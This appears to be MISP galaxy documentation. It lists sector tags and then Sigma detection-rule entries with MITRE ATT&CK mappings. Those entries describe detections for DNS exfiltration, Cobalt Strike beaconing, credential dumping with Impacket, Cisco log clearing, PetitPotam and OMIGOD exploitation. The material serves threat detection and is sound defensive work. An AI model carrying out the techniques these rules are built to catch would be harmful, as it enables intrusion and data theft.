  • Media

NGO

The tag is: misp-galaxy:sector="NGO"

Oil

The tag is: misp-galaxy:sector="Oil"

Payment

The tag is: misp-galaxy:sector="Payment"

Pharmacy

The tag is: misp-galaxy:sector="Pharmacy"

Pharmacy is also known as:

  • Pharmaceutical

Police - Law enforcement

The tag is: misp-galaxy:sector="Police - Law enforcement"

Research - Innovation

The tag is: misp-galaxy:sector="Research - Innovation"

Satellite navigation

The tag is: misp-galaxy:sector="Satellite navigation"

Security systems

The tag is: misp-galaxy:sector="Security systems"

Social networks

The tag is: misp-galaxy:sector="Social networks"

Space

The tag is: misp-galaxy:sector="Space"

Steel

The tag is: misp-galaxy:sector="Steel"

Telecoms

The tag is: misp-galaxy:sector="Telecoms"

Telecoms is also known as:

  • Telecommunications

Think Tanks

The tag is: misp-galaxy:sector="Think Tanks"

Trade

The tag is: misp-galaxy:sector="Trade"

Transport

The tag is: misp-galaxy:sector="Transport"

Transport is also known as:

  • Transportation

Travel

The tag is: misp-galaxy:sector="Travel"

Turbine

The tag is: misp-galaxy:sector="Turbine"

Tourism

The tag is: misp-galaxy:sector="Tourism"

Life science

The tag is: misp-galaxy:sector="Life science"

Biomedical

The tag is: misp-galaxy:sector="Biomedical"

High tech

The tag is: misp-galaxy:sector="High tech"

Opposition

The tag is: misp-galaxy:sector="Opposition"

Political party

The tag is: misp-galaxy:sector="Political party"

Hospitality

The tag is: misp-galaxy:sector="Hospitality"

Automotive

The tag is: misp-galaxy:sector="Automotive"

Metal

The tag is: misp-galaxy:sector="Metal"

Railway

The tag is: misp-galaxy:sector="Railway"

Water

The tag is: misp-galaxy:sector="Water"

Smart meter

The tag is: misp-galaxy:sector="Smart meter"

Retail

The tag is: misp-galaxy:sector="Retail"

Technology

The tag is: misp-galaxy:sector="Technology"

Engineering

The tag is: misp-galaxy:sector="Engineering"

Mining

The tag is: misp-galaxy:sector="Mining"

Sport

The tag is: misp-galaxy:sector="Sport"

Restaurant

The tag is: misp-galaxy:sector="Restaurant"

Semi-conductors

The tag is: misp-galaxy:sector="Semi-conductors"

Semi-conductors is also known as:

  • Semiconductor

Insurance

The tag is: misp-galaxy:sector="Insurance"

The tag is: misp-galaxy:sector="Legal"

Shipping

The tag is: misp-galaxy:sector="Shipping"

Logistic

The tag is: misp-galaxy:sector="Logistic"

Construction

The tag is: misp-galaxy:sector="Construction"

Industrial

The tag is: misp-galaxy:sector="Industrial"

Industrial is also known as:

  • ICS

Communication equipment

The tag is: misp-galaxy:sector="Communication equipment"

Security Service

The tag is: misp-galaxy:sector="Security Service"

Tax firm

The tag is: misp-galaxy:sector="Tax firm"

Television broadcast

The tag is: misp-galaxy:sector="Television broadcast"

Separatists

The tag is: misp-galaxy:sector="Separatists"

Dissidents

The tag is: misp-galaxy:sector="Dissidents"

Digital services

The tag is: misp-galaxy:sector="Digital services"

Digital infrastructure

The tag is: misp-galaxy:sector="Digital infrastructure"

Security actors

The tag is: misp-galaxy:sector="Security actors"

eCommerce

The tag is: misp-galaxy:sector="eCommerce"

Islamic forums

The tag is: misp-galaxy:sector="Islamic forums"

Journalist

The tag is: misp-galaxy:sector="Journalist"

Streaming service

The tag is: misp-galaxy:sector="Streaming service"

Publishing industry

The tag is: misp-galaxy:sector="Publishing industry"

Islamic organisation

The tag is: misp-galaxy:sector="Islamic organisation"

Casino

The tag is: misp-galaxy:sector="Casino"

Consulting

The tag is: misp-galaxy:sector="Consulting"

Online marketplace

The tag is: misp-galaxy:sector="Online marketplace"

DNS service provider

The tag is: misp-galaxy:sector="DNS service provider"

Veterinary

The tag is: misp-galaxy:sector="Veterinary"

Marketing

The tag is: misp-galaxy:sector="Marketing"

Video Sharing

The tag is: misp-galaxy:sector="Video Sharing"

Advertising

The tag is: misp-galaxy:sector="Advertising"

Investment

The tag is: misp-galaxy:sector="Investment"

Accounting

The tag is: misp-galaxy:sector="Accounting"

Programming

The tag is: misp-galaxy:sector="Programming"

Managed Services Provider

The tag is: misp-galaxy:sector="Managed Services Provider"

Lawyers

The tag is: misp-galaxy:sector="Lawyers"

Civil society

The tag is: misp-galaxy:sector="Civil society"

Petrochemical

The tag is: misp-galaxy:sector="Petrochemical"

Immigration

The tag is: misp-galaxy:sector="Immigration"

Non-profit organisation

The tag is: misp-galaxy:sector="Non-profit organisation"

Non-profit organisation is also known as:

  • voluntary

  • charitable

  • non-profit-making

  • not-for-profit

Sigma-Rules

MISP galaxy cluster based on Sigma Rules..

Sigma-Rules is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

@Joseliyo_Jstnk

Juniper BGP Missing MD5

Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.

The tag is: misp-galaxy:sigma-rules="Juniper BGP Missing MD5"

Juniper BGP Missing MD5 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"

Table 8837. Table References

Links

https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/network/juniper/bgp/juniper_bgp_missing_md5.yml

Cleartext Protocol Usage

Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.

The tag is: misp-galaxy:sigma-rules="Cleartext Protocol Usage"

Table 8838. Table References

Links

https://www.cisecurity.org/controls/cis-controls-list/

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml

Telegram Bot API Request

Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind

The tag is: misp-galaxy:sigma-rules="Telegram Bot API Request"

Telegram Bot API Request has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 8839. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/

https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/

https://core.telegram.org/bots/faq

https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/

https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml

DNS Query to External Service Interaction Domains

Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE

The tag is: misp-galaxy:sigma-rules="DNS Query to External Service Interaction Domains"

DNS Query to External Service Interaction Domains has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002" with estimative-language:likelihood-probability="almost-certain"

Table 8840. Table References

Links

https://twitter.com/breakersall/status/1533493587828260866

https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_external_service_interaction_domains.yml

Cobalt Strike DNS Beaconing

Detects suspicious DNS queries known from Cobalt Strike beacons

The tag is: misp-galaxy:sigma-rules="Cobalt Strike DNS Beaconing"

Cobalt Strike DNS Beaconing has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 8841. Table References

Links

https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/

https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns

https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml

DNS TXT Answer with Possible Execution Strings

Detects strings used in command execution in DNS TXT Answer

The tag is: misp-galaxy:sigma-rules="DNS TXT Answer with Possible Execution Strings"

DNS TXT Answer with Possible Execution Strings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 8842. Table References

Links

https://twitter.com/stvemillertime/status/1024707932447854592

https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml

Suspicious DNS Query with B64 Encoded String

Detects suspicious DNS queries using base64 encoding

The tag is: misp-galaxy:sigma-rules="Suspicious DNS Query with B64 Encoded String"

Suspicious DNS Query with B64 Encoded String has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 8843. Table References

Links

https://github.com/krmaxwell/dns-exfiltration

https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_b64_queries.yml

Wannacry Killswitch Domain

Detects wannacry killswitch domain dns queries

The tag is: misp-galaxy:sigma-rules="Wannacry Killswitch Domain"

Wannacry Killswitch Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 8844. Table References

Links

https://www.mandiant.com/resources/blog/wannacry-ransomware-campaign

https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_wannacry_killswitch_domain.yml

Monero Crypto Coin Mining Pool Lookup

Detects suspicious DNS queries to Monero mining pools

The tag is: misp-galaxy:sigma-rules="Monero Crypto Coin Mining Pool Lookup"

Monero Crypto Coin Mining Pool Lookup has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"

Table 8845. Table References

Links

https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/

https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml

Cisco Discovery

Find information about network devices that is not stored in config files

The tag is: misp-galaxy:sigma-rules="Cisco Discovery"

Cisco Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

Table 8846. Table References

Links

https://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_discovery.yml

Cisco Modify Configuration

Modifications to a config that will serve an adversary’s impacts or persistence

The tag is: misp-galaxy:sigma-rules="Cisco Modify Configuration"

Cisco Modify Configuration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Server Software Component - T1505" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1565.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 8847. Table References

Links

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_modify_config.yml

Cisco File Deletion

See what files are being deleted from flash file systems

The tag is: misp-galaxy:sigma-rules="Cisco File Deletion"

Cisco File Deletion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"

Table 8848. Table References

Links

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_file_deletion.yml

Cisco Stage Data

Various protocols maybe used to put data on the device for exfil or infil

The tag is: misp-galaxy:sigma-rules="Cisco Stage Data"

Cisco Stage Data has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 8849. Table References

Links

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_moving_data.yml

Cisco Show Commands Input

See what commands are being input into the device by other people, full credentials can be in the history

The tag is: misp-galaxy:sigma-rules="Cisco Show Commands Input"

Cisco Show Commands Input has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bash History - T1552.003" with estimative-language:likelihood-probability="almost-certain"

Table 8850. Table References

Links

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_input_capture.yml

Cisco Collect Data

Collect pertinent data from the configuration files

The tag is: misp-galaxy:sigma-rules="Cisco Collect Data"

Cisco Collect Data has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 8851. Table References

Links

https://blog.router-switch.com/2013/11/show-running-config/

https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_collect_data.yml

Cisco Disabling Logging

Turn off logging locally or remote

The tag is: misp-galaxy:sigma-rules="Cisco Disabling Logging"

Cisco Disabling Logging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 8852. Table References

Links

https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_disable_logging.yml

Cisco Denial of Service

Detect a system being shutdown or put into different boot mode

The tag is: misp-galaxy:sigma-rules="Cisco Denial of Service"

Cisco Denial of Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"

Table 8853. Table References

Links

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_dos.yml

Cisco Sniffing

Show when a monitor or a span/rspan is setup or modified

The tag is: misp-galaxy:sigma-rules="Cisco Sniffing"

Cisco Sniffing has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 8854. Table References

Links

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_net_sniff.yml

Cisco Local Accounts

Find local accounts being created or modified as well as remote authentication configurations

The tag is: misp-galaxy:sigma-rules="Cisco Local Accounts"

Cisco Local Accounts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 8855. Table References

Links

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_local_accounts.yml

Cisco Crypto Commands

Show when private keys are being exported from the device, or when new certificates are installed

The tag is: misp-galaxy:sigma-rules="Cisco Crypto Commands"

Cisco Crypto Commands has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 8856. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml

Cisco Clear Logs

Clear command history in network OS which is used for defense evasion

The tag is: misp-galaxy:sigma-rules="Cisco Clear Logs"

Cisco Clear Logs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 8857. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609

https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_clear_logs.yml

Cisco LDP Authentication Failures

Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels

The tag is: misp-galaxy:sigma-rules="Cisco LDP Authentication Failures"

Cisco LDP Authentication Failures has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"

Table 8858. Table References

Links

https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml

Cisco BGP Authentication Failures

Detects BGP failures which may be indicative of brute force attacks to manipulate routing

The tag is: misp-galaxy:sigma-rules="Cisco BGP Authentication Failures"

Cisco BGP Authentication Failures has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"

Table 8859. Table References

Links

https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml

Huawei BGP Authentication Failures

Detects BGP failures which may be indicative of brute force attacks to manipulate routing.

The tag is: misp-galaxy:sigma-rules="Huawei BGP Authentication Failures"

Huawei BGP Authentication Failures has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"

Table 8860. Table References

Links

https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/network/huawei/bgp/huawei_bgp_auth_failed.yml

Default Cobalt Strike Certificate

Detects the presence of default Cobalt Strike certificate in the HTTPS traffic

The tag is: misp-galaxy:sigma-rules="Default Cobalt Strike Certificate"

Table 8861. Table References

Links

https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml

Publicly Accessible RDP Service

Detects connections from routable IPs to an RDP listener - which is indicative of a publicly-accessible RDP service.

The tag is: misp-galaxy:sigma-rules="Publicly Accessible RDP Service"

Publicly Accessible RDP Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 8862. Table References

Links

https://attack.mitre.org/techniques/T1021/001/

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_rdp_public_listener.yml

Kerberos Network Traffic RC4 Ticket Encryption

Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting

The tag is: misp-galaxy:sigma-rules="Kerberos Network Traffic RC4 Ticket Encryption"

Kerberos Network Traffic RC4 Ticket Encryption has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 8863. Table References

Links

https://adsecurity.org/?p=3458

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_susp_kerberos_rc4.yml

Potential PetitPotam Attack Via EFS RPC Calls

Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'

The tag is: misp-galaxy:sigma-rules="Potential PetitPotam Attack Via EFS RPC Calls"

Potential PetitPotam Attack Via EFS RPC Calls has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187" with estimative-language:likelihood-probability="almost-certain"

Table 8864. Table References

Links

https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp

https://msrc.microsoft.com/update-guide/vulnerability/ADV210003

https://threatpost.com/microsoft-petitpotam-poc/168163/

https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml

WebDav Put Request

A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.

The tag is: misp-galaxy:sigma-rules="WebDav Put Request"

WebDav Put Request has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

Table 8865. Table References

Links

https://github.com/OTRF/detection-hackathon-apt29/issues/17

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_webdav_put_request.yml

Remote Task Creation via ATSVC Named Pipe - Zeek

Detects remote task creation via at.exe or API interacting with ATSVC namedpipe

The tag is: misp-galaxy:sigma-rules="Remote Task Creation via ATSVC Named Pipe - Zeek"

Remote Task Creation via ATSVC Named Pipe - Zeek has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 8866. Table References

Links

https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml

Executable from Webdav

Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/

The tag is: misp-galaxy:sigma-rules="Executable from Webdav"

Executable from Webdav has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 8867. Table References

Links

https://github.com/OTRF/detection-hackathon-apt29

http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml

DNS TOR Proxies

Identifies IPs performing DNS lookups associated with common Tor proxies.

The tag is: misp-galaxy:sigma-rules="DNS TOR Proxies"

DNS TOR Proxies has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

Table 8868. Table References

Links

https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_torproxy.yml

OMIGOD HTTP No Authentication RCE

Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.

The tag is: misp-galaxy:sigma-rules="OMIGOD HTTP No Authentication RCE"

OMIGOD HTTP No Authentication RCE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 8869. Table References

Links

https://twitter.com/neu5ron/status/1438987292971053057?s=20

https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml

MITRE BZAR Indicators for Execution

Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE

The tag is: misp-galaxy:sigma-rules="MITRE BZAR Indicators for Execution"

MITRE BZAR Indicators for Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8870. Table References

Links

https://github.com/mitre-attack/bzar#indicators-for-attck-execution

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml

Possible Impacket SecretDump Remote Activity - Zeek

Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml

The tag is: misp-galaxy:sigma-rules="Possible Impacket SecretDump Remote Activity - Zeek"

Possible Impacket SecretDump Remote Activity - Zeek has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 8871. Table References

Links

https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml

Suspicious PsExec Execution - Zeek

detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one

The tag is: misp-galaxy:sigma-rules="Suspicious PsExec Execution - Zeek"

Suspicious PsExec Execution - Zeek has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8872. Table References

Links

https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html

